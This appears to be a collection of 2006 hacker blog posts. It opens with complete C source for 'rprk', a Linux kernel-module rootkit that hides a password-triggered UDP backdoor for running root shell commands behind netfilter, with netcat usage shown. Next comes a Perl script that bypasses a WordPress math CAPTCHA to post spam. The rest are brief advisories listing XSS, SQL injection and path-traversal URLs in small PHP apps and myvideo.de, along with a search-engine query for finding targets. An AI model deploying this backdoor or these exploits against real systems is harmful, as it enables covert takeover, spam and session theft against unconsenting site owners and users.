rockprincess rootkit

/*
* rprk 0.1 - a simple rootkit for linux 2.6
*
* this programm is only for education purposes designed,
* you are _not_ allowed to distribute this programm.
*
* usage:
* compile the module for you target hosts kernel.
* load the module with the parameters "password" and "listen_port",
* e.g: insmod rprk.ko password=lamo listen_port=5555
* now you can control the target host.
* the rootkit even bypasses linux's netfilter.
* e.g: echo "lamotouch /rp_was_here"|netcat -u target.host.com 5555
* this will execute the command "touch /rp_was_here" on target.host.com.
*
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

struct exec_work {
struct work_struct work;
char *command;
};

static char password[256];
static char clisten_port[17];
static long listen_port;

static void exec_func(void *data)
{
struct exec_work *exec_work = data;
char *argv[] = { "/bin/sh", "-c", exec_work->command, NULL };
static char *envp[] = { "HOME=/", "TERM=linux",
"PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };

call_usermodehelper("/bin/sh", argv, envp, 0);
}

module_param_string(password, password, 256, 0);
MODULE_PARM_DESC(password, " password=secret\n");
module_param_string(listen_port, clisten_port, 17, 0);
MODULE_PARM_DESC(listen_port, " listen_port=6666\n");

static inline int execute_command(char *cmd)
{
struct exec_work *exec_work;

exec_work = kmalloc(sizeof(struct exec_work), GFP_ATOMIC);
exec_work->command = kmalloc(1024 * sizeof(char), GFP_ATOMIC);

INIT_WORK(&exec_work->work, exec_func, exec_work);

strncpy(exec_work->command, cmd, strlen(cmd) + 1);
schedule_work(&exec_work->work);

return 0;
}

static unsigned int hook_handle(unsigned int hooknum,
struct sk_buff **skb_p,
const struct net_device *in,
const struct net_device *out,
int (*okfn)(struct sk_buff *))
{
struct sk_buff *skb = *skb_p;
struct iphdr *iph = skb->nh.iph;
struct udphdr *udph = (struct udphdr *)(skb->data + iph->ihl * 4);
unsigned int payload_offset = (iph->ihl * 4) + 8;
char *payload = skb->data + payload_offset;
char *sent_passwd, *sent_command;
int i, passwdlen, sent_strlen = skb->len - payload_offset;

if (iph->protocol != IPPROTO_UDP)
goto out;

if(!(ntohs(udph->dest) == listen_port))
goto out;

if(sent_strlen > 1024)
sent_strlen = 1024;

passwdlen = strlen(password);

if(sent_strlen < 1 || sent_strlen < passwdlen)
goto out;

if(!(sent_passwd = kmalloc(passwdlen * sizeof(char) + 1, GFP_ATOMIC)))
goto out1;

if(!(sent_command = kmalloc((sent_strlen - passwdlen) * sizeof(char) + 1, GFP_ATOMIC)))
goto out0;

for (i = 0; i < passwdlen; i++)
sent_passwd[i] = payload[i];
for (i = 0 ; i < sent_strlen - passwdlen; i++){
if(payload[i + passwdlen] == '\n'){
sent_command[i] = '\0';
break;
}
sent_command[i] = payload[i + passwdlen];
}

if(strncmp(sent_passwd, password, passwdlen) == 0){
execute_command(sent_command);
}

out0:
kfree(sent_command);
out1:
kfree(sent_passwd);
out:
return NF_ACCEPT;
}

static struct nf_hook_ops rprk_ops = {
.hook = hook_handle,
.owner = THIS_MODULE,
.pf = PF_INET,
.hooknum = NF_IP_LOCAL_IN,
.priority = NF_IP_PRI_FIRST
};

static int __init init(void)
{
int err;

listen_port = simple_strtol(clisten_port, NULL, 0);

if(!password)
return 1;
if(!(listen_port > 0 && listen_port < 65536))
return 1;

err = nf_register_hook(&rprk_ops);
if(err < 0)
return err;

return 0;
}

static void __exit fini(void)
{
nf_unregister_hook(&rprk_ops);
}

module_init(init);
module_exit(fini);

Math Comment Spam Protection Plugin - by-pass

wordpress plugin against spam (@ Michael Woehrer)
-> http://sw-guide.de/wordpress/math-comment-spam-protection-plugin/

easy to by-pass you must only send $mathuseranswer + $mathresult with any validate value.


#!/usr/bin/perl -w

use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use strict;

# mathuseranswer 9+5 14
# mathresult 59568733


my $url = 'http://localhost/wordpress/wp-comments-post.php';

my $req = POST $url,
[
comment_post_ID => '3',
author => 'spam',
email => 'more\@spam.com',
comment => 'spammm2',
mathuseranswer => '14',
mathresult => '59568733'
];

print "HTTP-FullRequest-Header: \n";
print $req->headers->as_string() , "\n";

print "HTTP-FullRequest-Header-Content: \n";
print $req->content() ,"\n";


my $ua = LWP::UserAgent->new();

my $response = $ua->request($req);

if ( $response->is_error() ) {
print "Error-Code : ", $response->code() , "\n";
print "Fehlermeldung: ", $response->message() , "\n";
}
else {
print $response->content() , "\n";
}


(c)2005-Comments-Script - XSS Vulnerability


(c)2005-Comments-Script - XSS Vulnerability
--------------------------------------------------------
Software: (c)2005-Comments-Script
Version:
Type: XSS Vulnerability
Date: Mai 5 20:45:53 CEST 2006
Vendor: Www.Goël.Ch
Page: http://xn--gol-kma.ch
Risc: low

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/

vulnerability:
----------------------------
http://[target]/kommentar.php?id=[XSS]

solution:
----------------------------
validate $id


notes:
----------------------------
The vendor has been informed.


Dynamic Galerie 1.0 - path traversal + XSS Vulnerability


Dynamic Galerie 1.0 - path traversal + XSS Vulnerability
--------------------------------------------------------
Software: Dynamic Galerie
Version: 1.0
Type: path traversal + XSS Vulnerability
Date: Mai 5 19:45:53 CEST 2006
Vendor: timo braun
Page: http://www.timobraun.de/
Risc: middle

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/

vulnerability:
----------------------------
http://[target]/index.php?pfad=/tmp/
http://[target]/galerie.php?pfad=/home/

http://[target]/index.php?pfad=[XSS]
http://[target]/galerie.php?id=[XSS]


solution:
----------------------------
validate $pfad, $id


notes:
----------------------------
The vendor has been informed.


321soft PhP Gallery 0.9 - directory travel & XSS


321soft PhP Gallery 0.9 - directory travel & XSS
--------------------------------------------------------
Software: 321soft PhP Gallery
Version: 0.9
Type: directory travel & XSS
Date: Mai 3 01:38:04 CEST 2006
Vendor: 321soft.de
Page: http://321soft.de/
Risc: Middle

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/

vulnerability:
----------------------------
http://[target]/index.php?path=/etc
http://[target]/index.php?path=/tmp

http://[target]/index.php?path=[XSS]

solution:
----------------------------
index.php
fix $path

notes:
----------------------------
The vendor has been informed.


PHP Linkliste 1.0b - XSS


Linpha - XSS Vulnerabilities
--------------------------------------------------------
Software: PHP Linkliste
Version: 1.0b
Type: Cross Site Scripting Vulnerability
Date: Wed Mai 3 00:45:02 CEST 2006
Vendor: php design x
Page: http://www.php-designx.de
Risc: middle

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/

vulnerability:
----------------------------
http://[target]/links.php?new_input=[XSS]&new_url=[XSS]&new_name=[XSS]
the content is written in links.dat which have chmod 777 (readme)

solution:
----------------------------
validate in links.php all formfields.



PHPKB Knowledge Base - XSS


http://www.knowledgebase-script.com/demo/search.php?searchkeyword=[XSS]


update:
the vendor have informed me that there is no hole.
i only had a look on the online demo. if you want you can send me a fullversion. :)

and sorry guys i didnt post it to http://secunia.com/

myvideo.de Xss


myvideo.de is a new site for free-video-hosting.

in all formfields i saw, it was possible to include javascript-code.
the use unsecure-cookies, so it is easy to steal them and login as another person.

examples:

http://www.myvideo.de/watch/xy (comment-box)
http://www.myvideo.de/online/page.php?P=xy&U_ID=xy (profil)
http://www.myvideo.de/online/page.php?P=xy&volltext=[XSS]&Submit=Suche (search-box)


Linpha - XSS Vulnerabilities


Linpha - XSS Vulnerabilities
--------------------------------------------------------
Software: Linpha
Version: 1.1.0
Type: Cross Site Scripting Vulnerability
Date: Mon Apr 17 22:59:39 CEST 2006
Vendor: The LinPHA developers
Page: http://linpha.sourceforge.net/
Risc: Low

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/
Greetz: karambole

vulnerability:
----------------------------
http://[target]/plugins/stats/stats_view.php?date_from=[XSS]
http://[target]/plugins/stats/stats_view.php?date_to=[XSS]
http://[target]/plugins/stats/stats_view.php?date=[XSS]

notes:
----------------------------
The vendor has been informed.


PowerClan 1.14 - SQL Injection


PowerClan 1.14 - SQL Injection
--------------------------------------------------------
Software: PowerClan 1.14
Version: 1.14
Type: SQL Injection
Date: Apr 13 23:37:50 CEST 2006
Vendor: powerscripts.org
Page: http://www.powerscripts.org
Risc: Middle

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/

vulnerability:
----------------------------
magic_quotes_gpc = off
http://[target]/member.php?pcpage=showmember&memberid=[SQL]

solution:
----------------------------
member.php
fix $memberid

notes:
----------------------------
The vendor has been informed.


planetSearch+ - XSS Vulnerabilities


planetSearch+ - XSS Vulnerabilities
--------------------------------------------------------
Software: planetSearch+
Version: 26.10.2005
Type: Cross Site Scripting Vulnerability
Date: Apr 13 20:44:54 CEST 2006
Vendor: PlaNet Concept e.K.
Page: http://www.planetc.de
Risc: Low

credits:
----------------------------
d4igoro - d4igoro[at]gmail[dot]com
http://d4igoro.blogspot.com/
Greetz: kara & hm

vulnerability:
----------------------------
http://[target]/planetsearchplus.php?search_exp=[XSS]

solution:
----------------------------
planetsearchplus.php
fix $search_exp

notes:
----------------------------
The vendor has been informed.

googledork:
----------------------------
intitle:"planetSearch+"